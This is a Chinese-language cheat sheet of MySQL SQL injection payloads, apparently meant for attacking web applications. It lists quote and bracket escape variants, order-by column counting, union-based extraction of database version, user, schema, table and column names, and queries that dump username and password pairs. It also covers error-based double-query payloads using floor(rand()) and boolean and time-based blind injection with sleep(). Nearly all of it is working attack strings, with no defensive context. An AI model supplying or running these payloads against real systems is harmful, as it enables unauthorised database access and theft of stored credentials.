常见注入语句

#常规注入
' --+
' --%20
' #
' %23
' and 1=1 --+
' and 1=2 --+
' and 1=2 union select * from admin --+
' and 1=2 union select * from user --+
' and 1=2 union select * from users --+
#爆字段长度
' order by 1 --+
' order by 2 --+
' order by 3 --+
' order by 4 --+
' order by 5 --+
' order by 6 --+
' order by 7 --+
' order by 8 --+
' order by 9 --+
' order by 10 --+
#爆数据库信息,这仅限于字段长度为1
' and 1=2 union all select version() --+
' and 1=2 union all select user() --+
' and 1=2 union all select database() --+
#判断操作系统
' and 1=2 union all select @@global.version_compile_os from mysql.user --+
#数据库权限，返回正常说明root权限；
' and ord(mid(user(),1,1))=114 --+
#爆数据
' and 1=2 union select user(),version(),database(),@@datadir,SCHEMA_NAME,current_user(),7,8,9,10 from information_schema.SCHEMATA limit 0,1 --+
' and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8,9,10 from information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1--+
' and 1=2 union select 1,2,3,COLUMN_NAME,5,6,7,8,9,10 from information_schema.COLUMNS where TABLE_NAME=table_name limit 0,1--+
' and 1=2 union select 1,2,3,group_concat(COLUMN_NAME),5,6,7,8,9,10 from information_schema.COLUMNS where TABLE_NAME=table_name limit 0,1--+
' and 1=2 union select 1,2,3,group_concat(username),5,6,7,8,9,10 from table_name --+
' and 1=2 union select 1,2,3,group_concat(username,0x3a,password),5,6,7,8,9,10 from table_name --+

#不使用注释符
' and '1
' union select 1 and '1 
' union select 1,2 and '1 
' and 1=2 union select 1,version(),3 and '1 
' or '1 

#带括号防注入
') --+
') --%20
') #
') %23

#双引号防注入
" --+
" --%20
" #
" %23

#双引号+括号
") --+
") --%20
") #
") %23

#双查询输入
#统计有多少字段
select count(*) from table_name;
#随机数生成
select rand();
select rand()*4;
#浮点数
select floor(rand());
select floor(rand()*4);
#别名
select floor(rand()*4) as query;
#分组
select username,password from user group by username;
#两次查询
select(select database());
#连接字符串concat(str1,str2)
select concat((select database()));
select concat(0x3a,0x3a,(select database()),0x3a,0x3a);
select concat(0x3a,0x3a,(select database()),0x3a,0x3a) as query;
select concat(0x3a,0x3a,(select database()),0x3a,floor(rand()*2)) as query;
select concat(0x3a,0x3a,(select database()),0x3a,floor(rand()*2)) as query from user;
select count(*),concat(0x3a,0x3a,(select database()),0x3a,floor(rand()*2)) as query from user group by query;
select count(*),concat(0x3a,0x3a,(select user()),0x3a,floor(rand()*2)) as query from user group by query;
select count(*),concat(0x3a,0x3a,(select table_name from information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1),0x3a,floor(rand()*2)) as query from user group by query;

' and (select 1 from (select count(*),concat(0x3a,0x3a,(select table_name from information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1),0x3a,floor(rand()*2)) as query from user group by query) as test) --+
' and 1=2 union (select * from (select count(*),concat(0x3a,0x3a,(select table_name from information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1),0x3a,floor(rand()*2)) as query from user group by query) as test) --+

#盲注
#bool型盲注
select database();
#判断长度
select length(database());
#截取字符串substr(str,num1,num2) num1:从第几个开始取;num2:取多少个
select substr(database(),1,1);  
#ascii码
select ascii(substr(database(),1,1));

' and 1<2 --+
' and (ascii(substr((select database()),1,1)))=98--+

#时间型盲注
#睡眠
select sleep(1);
#进行判断
select if((select database())="bloodzero",sleep(10),null);

' and sleep(10) --+
' and if((select database())="bloodzero",sleep(10),null)--+